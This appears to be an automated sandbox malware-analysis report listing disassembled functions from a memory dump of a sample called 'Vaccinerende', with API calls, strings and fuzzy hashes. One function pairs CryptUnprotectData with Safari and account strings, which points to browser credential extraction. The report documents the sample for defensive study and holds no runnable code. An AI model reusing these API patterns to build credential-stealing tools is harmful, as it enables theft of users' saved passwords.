                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                              • String ID:
                                                                              • API String ID: 2136311172-0
                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                              Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@
                                                                              • String ID:
                                                                              • API String ID: 1936579350-0
                                                                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                              Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free
                                                                              • String ID:
                                                                              • API String ID: 1294909896-0
                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                              Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free
                                                                              • String ID:
                                                                              • API String ID: 1294909896-0
                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                                                                              Non-executed Functions

                                                                              Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                              • String ID:
                                                                              • API String ID: 3604893535-0
                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                              Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044D5
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                              • API String ID: 2780580303-317687271
                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                              Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                              • String ID:
                                                                              • API String ID: 4218492932-0
                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                              Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EmptyClipboard.USER32 ref: 00409882
                                                                              • wcslen.MSVCRT ref: 0040988F
                                                                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                              • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                              • CloseClipboard.USER32 ref: 004098D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                              • String ID:
                                                                              • API String ID: 1213725291-0
                                                                              • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                              • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                              Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32 ref: 004182D7
                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                              • LocalFree.KERNEL32(?), ref: 00418342
                                                                              • free.MSVCRT ref: 00418370
                                                                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                              • String ID: OsError 0x%x (%u)
                                                                              • API String ID: 2360000266-2664311388
                                                                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                              Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@memcpymemset
                                                                              • String ID:
                                                                              • API String ID: 1865533344-0
                                                                              • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                              • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                              Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                              Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcsicmp.MSVCRT ref: 004022A6
                                                                              • _wcsicmp.MSVCRT ref: 004022D7
                                                                              • _wcsicmp.MSVCRT ref: 00402305
                                                                              • _wcsicmp.MSVCRT ref: 00402333
                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                              • memset.MSVCRT ref: 0040265F
                                                                              • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                              • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                              • API String ID: 2929817778-1134094380
                                                                              • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                              • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                              Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                              • String ID: :stringdata$ftp://$http://$https://
                                                                              • API String ID: 2787044678-1921111777
                                                                              • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                              • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                              • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                              • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                              Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                              • GetWindowRect.USER32(?,?), ref: 00414088
                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                              • GetDC.USER32 ref: 004140E3
                                                                              • wcslen.MSVCRT ref: 00414123
                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                              • ReleaseDC.USER32(?,?), ref: 00414181
                                                                              • _snwprintf.MSVCRT ref: 00414244
                                                                              • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                              • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                              • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                              • GetClientRect.USER32(?,?), ref: 004142E1
                                                                              • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                              • GetClientRect.USER32(?,?), ref: 0041433B
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                              • String ID: %s:$EDIT$STATIC
                                                                              • API String ID: 2080319088-3046471546
                                                                              • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                              • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                              • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                              • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                              Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                              • memset.MSVCRT ref: 00413292
                                                                              • memset.MSVCRT ref: 004132B4
                                                                              • memset.MSVCRT ref: 004132CD
                                                                              • memset.MSVCRT ref: 004132E1
                                                                              • memset.MSVCRT ref: 004132FB
                                                                              • memset.MSVCRT ref: 00413310
                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                              • memset.MSVCRT ref: 004133C0
                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                              Strings
                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                              • {Unknown}, xrefs: 004132A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                              • API String ID: 4111938811-1819279800
                                                                              • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                              • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                              Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
